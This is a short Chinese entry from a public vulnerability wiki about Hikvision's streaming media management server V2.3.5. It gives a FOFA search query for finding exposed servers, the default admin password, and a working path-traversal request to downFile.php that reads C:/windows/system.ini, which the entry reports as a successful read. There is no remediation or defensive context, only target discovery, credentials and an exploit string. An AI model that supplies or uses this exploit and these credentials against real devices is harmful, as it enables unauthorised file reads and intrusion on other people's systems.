PWNWIK.COM==免费、自由、人人可编辑的漏洞库
,
漏洞影响
杭州海康威视数字技术股份有限公司 流媒体管理服务器 V2.3.5
FOFA
FOFA:title="流媒体管理服务器"
默认登录信息
admin/12345
POC
http://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini
成功读取 C:/windows/system.ini
PWNWIK.COM==免费、自由、人人可编辑的漏洞库
